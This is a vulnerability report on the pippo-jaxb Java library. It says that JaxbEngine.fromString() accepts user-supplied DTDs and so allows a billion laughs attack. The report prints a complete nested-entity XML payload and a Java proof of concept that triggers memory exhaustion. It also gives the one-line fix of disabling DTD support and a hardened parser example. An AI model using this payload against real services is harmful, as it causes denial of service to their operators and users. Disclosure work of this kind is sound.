groupId: ro.pippo
artifactId: pippo-jaxb
version: 1.12.0
> Pippo unsafely parses user-provided XML. The fromString() method in the ro.pippo.jaxb.JaxbEngine class accepts user-provided DTDs that the rest of the XML may reference. This can lead to recursive entity expansion and a subsequent billion laughs attack.
Source File and Line Number: https://github.com/pippo-java/pippo/blob/7da9f4db945d10113cf4ea4ed44ba0f1a7f83a8f/pippo-content-type-parent/pippo-jaxb/src/main/java/ro/pippo/jaxb/JaxbEngine.java#L78
> Detailed steps to reproduce with all required references/steps/commands. Any sample/exploit code or other proof of concept.
<?xml version="1.0"?>
<!DOCTYPE PERSON [
<!ENTITY PERSON "PERSON">
<!ELEMENT PERSON (#PCDATA)>
<!ENTITY PERSON1 "&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;">
<!ENTITY PERSON2 "&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;">
<!ENTITY PERSON3 "&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;">
<!ENTITY PERSON4 "&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;">
<!ENTITY PERSON5 "&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;">
<!ENTITY PERSON6 "&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;">
<!ENTITY PERSON7 "&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;">
<!ENTITY PERSON8 "&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;">
<!ENTITY PERSON9 "&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;">
]>
<PERSON>&PERSON9;</PERSON>
import org.apache.commons.io.IOUtils;
import ro.pippo.jaxb.JaxbEngine;

import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.bind.annotation.XmlValue;
import java.io.IOException;

public class JaxBEnginePoC {

    // Minimal JAXB target added so the PoC compiles; the report referenced Person without defining it.
    @XmlRootElement(name = "PERSON")
    public static class Person {
        @XmlValue
        public String value;
    }

    public static void main(String[] args) throws IOException {
        // Classpath resource containing the XML payload shown above
        String resourceName = args[0];
        String payload = IOUtils.toString(
            JaxBEnginePoC.class.getResourceAsStream(resourceName),
            "UTF-8"
        );
        JaxbEngine jaxbEngine = new JaxbEngine();
        // The StAX reader expands the nested entities here, before JAXB builds any object
        Object myObj = jaxbEngine.fromString(payload, Person.class);
        System.out.println("Completed!");
    }
}
> If you’re able to provide a patch with the fix, please post it in this section (or attach)
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, true);
Should Be
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
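The report's proposed fix, as an added example that is not pippo's own code: the vulnerable and hardened XMLInputFactory configurations side by side, each reading a constructed one-entity document of the same shape as the PoC. On the JDK's built-in StAX implementation the hardened factory fails the read with an XMLStreamException at the entity reference instead of expanding it.

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import java.io.StringReader;

public class HardenedStaxDemo {
    // Constructed sample: a DOCTYPE with a single internal entity, the smallest
    // document of the same shape as the report's PoC.
    static final String DOCTYPE_DOC =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE PERSON [<!ENTITY E \"x\">]>\n" +
        "<PERSON>&E;</PERSON>";

    // Mirrors the vulnerable setting quoted in the report: DTDs honoured, entities expanded.
    static XMLInputFactory vulnerableFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, true);
        return f;
    }

    // The report's fix, plus refusing external entities so a DTD cannot pull in outside content.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    // Drains the stream and returns its character content; the parser throws
    // XMLStreamException if it rejects the document.
    static String readText(XMLInputFactory f, String xml) throws XMLStreamException {
        XMLStreamReader r = f.createXMLStreamReader(new StringReader(xml));
        StringBuilder sb = new StringBuilder();
        while (r.hasNext()) {
            if (r.next() == XMLStreamConstants.CHARACTERS) sb.append(r.getText());
        }
        r.close();
        return sb.toString();
    }

    public static void main(String[] args) throws XMLStreamException {
        // Vulnerable: the entity is expanded and the element text is "x"
        System.out.println("vulnerable: " + readText(vulnerableFactory(), DOCTYPE_DOC));
        try {
            readText(hardenedFactory(), DOCTYPE_DOC);
            System.out.println("hardened: unexpectedly accepted the document");
        } catch (XMLStreamException e) {
            System.out.println("hardened: rejected: " + e.getMessage());
        }
    }
}
```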
> State all technical information about the stack where the vulnerability was found
> Select Y or N for the following statements:
> Finder’s comments and funny memes goes here
http://i.imgur.com/3POtveC.jpg
Is it pronounced imgur or imgur? Gif or Gif?
It causes a DoS. Specifically: entities are expanded recursively and large amounts of heap memory are consumed. Eventually the JVM process runs out of memory. If the OS does not bound the memory of that process, exhaustion continues and affects other processes on the system.